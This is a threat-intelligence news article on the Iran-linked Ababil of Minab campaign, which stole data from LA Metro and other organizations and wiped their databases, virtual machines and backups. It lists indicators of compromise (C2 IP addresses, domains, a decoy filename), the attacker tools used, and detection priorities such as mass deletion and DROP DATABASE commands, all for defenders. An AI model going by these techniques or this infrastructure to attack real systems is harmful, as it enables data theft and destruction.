Iran-Linked Ababil of Minab Campaign Targeted IT, Backups, and Recovery Systems
9 min. read 
Published on
An Iran-linked cyber campaign tied to the pro-Iran persona Ababil of Minab targeted organizations in the United States, Israel, Saudi Arabia, and Turkey, with some intrusions moving from data theft into deliberate destruction of IT, virtualization, database, storage, and backup systems.
Gambit Security said the activity surfaced publicly in late March and early April 2026 after Ababil of Minab claimed attacks against Los Angeles County Metropolitan Transportation Authority, also known as LA Metro, and other organizations. Gambit said forensic evidence links the persona to infrastructure and activity associated with Iran’s Ministry of Intelligence and Security.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
The campaign matters because it focused on the recovery layer. Instead of only stealing files or defacing websites, the attackers deleted virtual machines, databases, storage volumes, operating system files, and backups in an effort to make restoration harder.
What Happened in the Ababil of Minab Campaign
The public side of the campaign began with claims against LA Metro, but the same persona also claimed attacks affecting South Florida Regional Transportation Authority, Vyncs owner Agnik, and Saudi infrastructure company UNIMAC. Reuters reported that Gambit linked the LA Metro breach to Iranian hackers and said the attackers stole at least 700 GB of emails, backups, and other files from the agency.
LA Metro detected unauthorized activity in mid-March and limited employee access to internal administrative systems while it investigated. The Los Angeles Times reported that essential rail and bus service continued, but the agency had to review about 1,400 servers before restoring access.
The attackers presented themselves as an independent pro-Iranian hacktivist group. Gambit’s analysis challenged that framing, tying the operation to Black Shadow-related infrastructure and activity that Israeli authorities and security researchers have associated with Iran’s intelligence services.
Key Details at a Glance
| Item | Details |
|---|---|
| Persona | Ababil of Minab |
| Attribution assessment | Iran-linked activity tied by Gambit to MOIS-associated infrastructure |
| Reported countries | United States, Israel, Saudi Arabia, and Turkey |
| Publicly claimed victims | LA Metro, South Florida Regional Transportation Authority, Vyncs, and UNIMAC |
| Main impact | Data theft and destructive activity against IT, virtualization, storage, database, and backup systems |
| Notable tooling | FileFiend, custom Flask receiver, Go tunneler, WipeFile, proxychains, xfreerdp, axel |
Cybersecurity Dive reported that Gambit attributed the operation to Black Shadow, a group linked by Israeli government and private security reporting to Iran’s Ministry of Intelligence and Security. The report also noted destructive activity against transportation, GPS tracking, and infrastructure targets.
The campaign fits two major attacker goals: data destruction and recovery inhibition. MITRE ATT&CK describes data destruction as activity that deletes, overwrites, or corrupts files to interrupt system availability, while MITRE ATT&CK describes inhibit system recovery as activity that deletes or disables recovery options.
LA Metro Was Disrupted, but Transit Service Continued
LA Metro publicly said it limited internal system access after its security team discovered unauthorized activity. The agency said essential rail and bus service continued, along with safety and security systems, while teams worked to restore internal access.
The disruption still affected riders. The LA Metro breach report said the agency continued bringing systems back online weeks after detection. Local reporting at the time also described arrival board and fare-loading problems for some customers.
The key lesson for transit and other critical infrastructure operators is that service continuity does not mean the incident lacked impact. Even when vehicles keep running, a cyberattack can damage administrative systems, payment services, customer information tools, internal servers, and recovery operations.
How the Attackers Targeted Recovery Systems
Gambit described a destructive playbook that attacked multiple layers of enterprise recovery. The attackers did not rely on one method. They combined scripted automation with hands-on keyboard activity against virtual machines, storage volumes, databases, Windows folders, and backup chains.
At some victims, the attackers reportedly deleted or powered off virtual machines through management consoles. In other cases, they targeted SQL Server databases, backup files, web hosting directories, and Windows system folders. This forced victims to rebuild more than one layer at the same time.
The Gambit report said the campaign’s destructive operations hit IT, applications, virtualization infrastructure, and backups. That kind of layered destruction can turn a normal restoration process into a complex recovery effort involving servers, identity systems, applications, databases, storage, and backups.
Observed Destructive Techniques
| Target Layer | Observed Activity | Operational Risk |
|---|---|---|
| Virtualization | Deleting or powering off virtual machines through management access | Loss of core systems and longer rebuild time |
| Databases | Dropping SQL Server databases through automation | Loss of application data and business records |
| Backups | Deleting daily database backup files and backup folders | Reduced chance of restoring clean systems quickly |
| Storage | Wiping volumes and renaming partitions | Destruction of local data and recovery targets |
| Operating system files | Deleting core Windows directories through manual activity | System instability and session loss |
The Vyncs incident showed how quickly database destruction can scale. Cybersecurity Dive’s report said attackers used Python scripts to delete operating system folders, databases, and backup files for the Vyncs car GPS tracker service.
The attackers also used public claims and propaganda to magnify the disruption. That combination of technical destruction and psychological pressure is common in influence-oriented cyber operations, especially when a state-linked actor wants a breach to have public effect.
Custom Tools Point to a Broader Operation
Investigators also found custom tooling for data theft. One tool compressed stolen files and uploaded them to a victim-controlled public website before attackers pulled them from their own infrastructure. Another tool, called FileFiend, scanned drives and network shares and sent files to a hardcoded command-and-control server.
The campaign also used a Flask-based file receiver, Go tunneling tools, proxied RDP access, and command-line utilities for file movement. These tools suggest the attackers built a workflow for both exfiltration and destructive follow-up activity.
Reuters noted that Ababil also claimed hacks affecting Tri-Rail, Vyncs, and UNIMAC. The Reuters report said additional victims identified by Gambit included organizations in Israel and Turkey that were not named publicly.
Selected Indicators of Compromise
| Type | Indicator | Description |
|---|---|---|
| IPv4 | 31.172.87.20 | Operator staging server |
| IPv4 | 212.83.61.213 | FileFiend command-and-control server |
| IPv4 | 66.85.26.183 | FileFiend command-and-control server |
| IPv4 | 195.20.17.129 | FileFiend command-and-control server |
| IPv4 | 46.246.125.131 | Source IP for propaganda infrastructure |
| IPv4 | 91.193.19.198 | Attacker-controlled exit node |
| Domain | nefeshhope[.]com | Operator-controlled site |
| Domain | members.nefeshhope[.]com | Observed communicating with Go tunneler |
| Domain | banujcobaar[.]com | Redirect infrastructure |
| Filename | Exchangedb.exe | Decoy filename for FileFiend uploader |
| Tool | proxychains | Used for proxied access |
| Tool | xfreerdp | Used for remote desktop access |
| Tool | axel | Command-line download accelerator used in exfiltration workflows |
| Tool | WipeFile | Windows secure deletion utility |
These indicators should support threat hunting, but they should not replace behavioral monitoring. The infrastructure and filenames can change, while the core behavior remains more stable: remote access, data staging, backup targeting, database deletion, virtualization console abuse, and recovery sabotage.
Defenders should also watch for hands-on-keyboard activity during destructive phases. Scripted deletion may run quickly, but manual access through RDP, web consoles, database tools, file managers, and backup panels can expose the attacker’s workflow.
What Critical Infrastructure Operators Should Do Now
- Separate backup management from normal domain administration.
- Use immutable or offline backups for critical systems and test restores regularly.
- Restrict access to virtualization consoles, backup portals, storage systems, and database administration tools.
- Alert on mass deletion of virtual machines, storage volumes, databases, backup chains, and operating system folders.
- Monitor for unusual RDP sessions, proxychains use, bulk file compression, and command-line transfer tools.
- Require multi-factor authentication for backup, virtualization, cloud, and privileged administrative platforms.
- Log and protect recovery systems with the same priority as production systems.
- Run recovery exercises that assume attackers have attempted to delete backups.
The CISA StopRansomware Guide advises organizations to maintain offline, encrypted backups and regularly test them. Although this campaign was not a conventional ransomware case, the same recovery principles apply because attackers deliberately targeted data and backups.
Organizations should also harden recovery identities. Backup administrators, hypervisor administrators, storage administrators, database administrators, and domain administrators should not all share the same access path. One compromised account should not give an attacker the ability to delete both production and recovery systems.
Detection Priorities for Destructive Attacks
| Detection Area | What to Watch | Why It Matters |
|---|---|---|
| Virtualization | Mass VM deletion, shutdown, snapshot deletion, or console login from unusual IPs | Attackers may use the management layer to erase many systems at once |
| Databases | Bulk DROP DATABASE commands and sudden backup file deletion | Database destruction can remove application data and recovery points |
| Backups | Backup chain deletion, retention policy changes, repository access, and failed restore tests | Recovery systems are a primary target in destructive campaigns |
| File systems | Mass deletion of system folders, web roots, and storage volumes | Attackers may combine automation with manual wiping |
| Remote access | RDP via proxies, new tunneling binaries, and unexpected admin sessions | Hands-on activity often precedes final destruction |
Security teams should map this activity to MITRE’s data destruction technique and MITRE’s system recovery inhibition technique. These categories help defenders build detection rules around destructive behavior instead of chasing only one malware family or one file hash.
Backup architecture also needs an adversary-focused review. The CISA guidance recommends tested backup and recovery practices, but organizations should also confirm whether backup consoles, credentials, storage repositories, and restore processes can survive a privileged intrusion.
Why the Campaign Matters
Ababil of Minab shows how destructive cyber operations can target the systems that make recovery possible. A victim can have backups on paper, but if attackers delete backup chains, wipe storage, remove virtual machines, and damage operating systems, recovery becomes slow and uncertain.
The campaign also shows why attribution alone should not drive response. Whether an attacker claims hacktivism or state-linked motives, defenders need to prepare for the same operational reality: attackers may destroy production systems and recovery infrastructure before defenders finish containment.
For critical infrastructure, transportation, education, insurance, and public-sector organizations, the priority is resilience. The question is no longer only whether attackers can get in. It is whether the organization can keep enough trusted systems, backups, identities, and recovery tooling intact to bring operations back.
FAQ
Ababil of Minab is a pro-Iranian cyber persona that claimed attacks against organizations including LA Metro, Tri-Rail, Vyncs, and UNIMAC. Gambit Security linked the activity to Iran-associated infrastructure and Black Shadow-related operations.
LA Metro said essential rail and bus service continued, along with safety and security systems. However, public reporting described disruptions to customer-facing systems such as arrival information and some fare-loading services.
The attackers targeted more than normal user data. Reports describe deletion of virtual machines, databases, backup files, storage volumes, operating system files, and recovery infrastructure at a subset of victims.
Public reporting linked Ababil of Minab claims or activity to LA Metro, South Florida Regional Transportation Authority, Vyncs owner Agnik, and Saudi infrastructure company UNIMAC. Gambit also identified additional unnamed victims in Israel and Turkey.
Organizations should isolate backup systems, use immutable or offline backups, test restores, protect virtualization and backup consoles with strong authentication, monitor for mass deletion, and restrict privileged access to recovery infrastructure.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages